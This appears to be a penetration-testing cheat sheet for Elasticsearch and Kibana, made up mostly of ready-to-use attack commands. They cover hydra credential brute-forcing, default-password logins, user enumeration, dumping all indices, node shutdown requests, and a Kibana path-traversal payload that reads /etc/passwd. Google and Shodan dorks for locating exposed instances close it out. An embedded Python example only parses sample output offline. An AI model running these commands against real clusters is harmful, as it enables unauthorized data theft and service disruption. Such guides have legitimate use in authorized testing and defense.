ElasticSearch-Pentesting
ElasticSearch exploit and Pentesting guide for penetration tester
ElasticSearch Pentesting
What is an Elasticsearch index?
An Elasticsearch index is a collection of related documents. Elasticsearch stores each document as JSON, which is why the `_search` responses below come back as JSON objects.
Brute Force Credentials
hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /
Default credentials
curl -X GET http://admin:elasticadmin@target:9200/
curl -X GET http://elastic:changeme@target:9200/
Basic User Enumeration
# List all roles on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role"
# List all users on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"
# Get more information about the rights of a user:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"
Elastic Info
curl -X GET http://target:9200/_cat/
curl -X GET http://target:9200/_cluster/health
curl -X GET http://target:9200/_nodes
curl -X GET http://target:9200/_remote/info
curl -X GET http://target:9200/_security/_authenticate
List all indices
http://target:9200/_cat/indices?v&s=docs.count
Dump index
http://target:9200/<index>/_search?pretty=true&size=100
http://target:9200/bank/_search?pretty=true
Dump all
http://target:9200/_search?pretty=true
Search
http://target:9200/_search?pretty=true&q=<search_term>
http://target:9200/<index>/_search?pretty=true&q=<search_term>
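The two responses used above have a fixed shape: `_cat/indices?v` is a whitespace-separated table, and `_search` returns documents under `hits.hits[]._source` (with `hits.total` an object in 7.x and a bare integer in 6.x). This added example, not part of the original repository, parses both offline from constructed samples so you can triage what an exposed cluster would reveal before it is reachable by anyone else:

```python
"""Offline parsers for Elasticsearch `_cat/indices?v` and `_search` output."""
import json

# Constructed sample of `GET /_cat/indices?v&s=docs.count` (not from a real cluster).
CAT_INDICES = """\
health status index     uuid                   pri rep docs.count docs.deleted store.size pri.store.size
yellow open   .kibana_1 a1B2c3D4e5F6g7H8i9J0kL 1   1          3            0      9.8kb          9.8kb
yellow open   customers b2C3d4E5f6G7h8I9j0K1lM 1   1       1200            4      1.1mb          1.1mb
yellow open   bank      c3D4e5F6g7H8i9J0k1L2mN 1   1       1000            0    379.3kb        379.3kb
"""

# Constructed sample of a `GET /bank/_search?size=2` response body (7.x shape).
SEARCH_RESPONSE = json.dumps({
    "took": 2, "timed_out": False,
    "hits": {"total": {"value": 1000, "relation": "eq"},
             "hits": [{"_index": "bank", "_id": "1",
                       "_source": {"account_number": 1, "email": "a@example.com"}},
                      {"_index": "bank", "_id": "6",
                       "_source": {"account_number": 6, "email": "b@example.com"}}]}})


def parse_cat_indices(text):
    """Turn the `?v` header row plus data rows into dicts keyed by column name."""
    lines = [l for l in text.splitlines() if l.strip()]
    headers = lines[0].split()
    rows = []
    for line in lines[1:]:
        row = dict(zip(headers, line.split()))
        row["docs.count"] = int(row["docs.count"])
        rows.append(row)
    return rows


def indices_by_doc_count(text, include_hidden=False):
    """Largest indices first; dot-prefixed system indices are skipped unless asked for."""
    rows = parse_cat_indices(text)
    if not include_hidden:
        rows = [r for r in rows if not r["index"].startswith(".")]
    return sorted(rows, key=lambda r: r["docs.count"], reverse=True)


def summarize_search(raw):
    """Report how many documents matched, how many were returned, and which fields appear."""
    data = json.loads(raw)
    total = data["hits"]["total"]
    total = total["value"] if isinstance(total, dict) else total  # 6.x returns a plain int
    docs = [hit["_source"] for hit in data["hits"]["hits"]]
    fields = sorted({key for doc in docs for key in doc})
    return {"total": total, "returned": len(docs), "fields": fields}
```

Note that `_search` returns only 10 hits unless `size` is set, so `total` rather than `returned` is the number to compare against `docs.count` when judging exposure.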
Shutting Down Nodes (the node shutdown API exists only in Elasticsearch 1.x; it was removed in 2.0)
curl -X POST http://target:9200/_shutdown
curl -X POST http://target:9200/_cluster/nodes/_master/_shutdown
Kibana Console LFI (CVE-2018-17246)
http://target:9200/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
Google Dorks to find Kibana Instances
inurl:app/kibana
inurl:app/kibana intext:Loading Kibana
inurl::5601/app/kibana
Shodan Dorks to find Kibana Instances
port:9200 elasticsearch
title:"kibana" port:"443"
kibana content-length: 217